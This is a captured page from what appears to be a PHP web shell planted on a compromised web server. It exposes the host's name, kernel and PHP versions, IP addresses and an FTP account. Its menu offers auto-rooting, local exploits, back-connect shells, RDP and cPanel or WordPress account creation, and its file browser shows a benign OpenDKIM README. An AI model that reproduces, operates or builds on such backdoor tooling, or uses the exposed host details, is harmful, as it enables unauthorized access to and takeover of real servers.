Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
opendkim /
[ HOME SHELL ]
Name
Size
Permission
Action
FEATURES
4.02
KB
-rw-r--r--
KNOWNBUGS
1.01
KB
-rw-r--r--
README
33.17
KB
-rw-r--r--
README.fedora
3.73
KB
-rw-r--r--
RELEASE_NOTES
78.8
KB
-rw-r--r--
RELEASE_NOTES.Sendmail
58.96
KB
-rw-r--r--
authheaders-check-setup-hook.l...
2.45
KB
-rw-r--r--
convert_keylist.sh
1.99
KB
-rw-r--r--
final.lua.sample
2.04
KB
-rw-r--r--
opendkim.conf.sample
21.49
KB
-rw-r--r--
opendkim.conf.simple
714
B
-rw-r--r--
opendkim.conf.simple-verify
435
B
-rw-r--r--
screen.lua.sample
984
B
-rw-r--r--
setup.lua.sample
2.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.fedora
##################################### #FEDORA-SPECIFIC README FOR OPENDKIM# ##################################### Last updated: Apr 30, 2015 by Steve Jenkins (steve@stevejenkins.com) Generating keys for OpenDKIM ============================ After installing the opendkim package, you MUST generate a pair of keys (public and private) before attempting to start the opendkim service. A valid private key must exist in the location expected by /etc/opendkim.conf before the service will start. A matching public key must be included in your domain's DNS records before remote systems can validate your outgoing mail's DKIM signature. Generating Keys Automatically ============================= To automatically create a pair of default keys for the local domain, do: % sudo /usr/sbin/opendkim-default-keygen The default keygen script will attempt to fetch the local domain name, generate a private and public key for the domain, then save them in /etc/opendkim/keys as default.private and default.txt with the proper ownership and permissions. NOTE: The default key generation script MUST be run by a privileged user (or root). Otherwise, the resulting private key ownership and permissions will not be correct. Generating Keys Manually ======================== A privileged user (or root) can manually generate a set of keys by doing the following: 1) Create a directory to store the new keys: % sudo mkdir /etc/opendkim/keys/example.com 2) Generate keys in that directory for a specific domain name and selector: % sudo /usr/sbin/opendkim-genkey -D /etc/opendkim/keys/example.com/ -d example.com -s default 3) Set the proper ownership for the directory and private key: % sudo chown -R root:opendkim /etc/opendkim/keys/example.com 4) Set secure permissions for the private key: % sudo chmod 640 /etc/opendkim/keys/example.com/default.private 5) Set standard permissions for the public key: % sudo chmod 644 /etc/opendkim/keys/example.com/default.txt Updating Key Location(s) in Configuration Files =============================================== If you run the opendkim-default-keygen script, the default keys will be saved in /etc/opendkim/keys as default.private and default.txt, which is the location expected by the default /etc/opendkim.conf file. If you manually generate your own keys, you must update the key location and name in /etc/opendkim.conf before attempting to start the opendkim service. Using OpenDKIM with SQL Datasets ================================ OpenDKIM on RedHat-based systems relies on OpenDBX for database access. Depending on which database you use, you may have to manually install one of the following OpenDBX subpackages (all of which are available via yum): - opendbx-firebird - opendbx-mssql - opendbx-mysql - opendbx-postgresql - opendbx-sqlite - opendbx-sqlite2 - opendbx-sybase If you have OpenDKIM configured to use SQL datasets on a systemd-based server, it might also be necessary to start the opendkim service after the database servers by referencing your database unit file(s) in the "After" section of the OpenDKIM unit file. For example, if using both MariaDB and PostgreSQL, in /usr/lib/systemd/system/opendkim.service change: After=network.target nss-lookup.target syslog.target to: After=network.target nss-lookup.target syslog.target mariadb.service postgresql.service Additional Configuration Help ============================= For help configuring your MTA (Postfix, Sendmail, etc.) with OpenDKIM, setting up DNS records with your public DKIM key, as well as instructions on configuring OpenDKIM to sign outgoing mail for multiple domains, follow the how-to at: http://wp.me/p1iGgP-ou Official documentation for OpenDKIM is available at http://opendkim.org/ OpenDKIM mailing lists are available at http://lists.opendkim.org/ ###
Close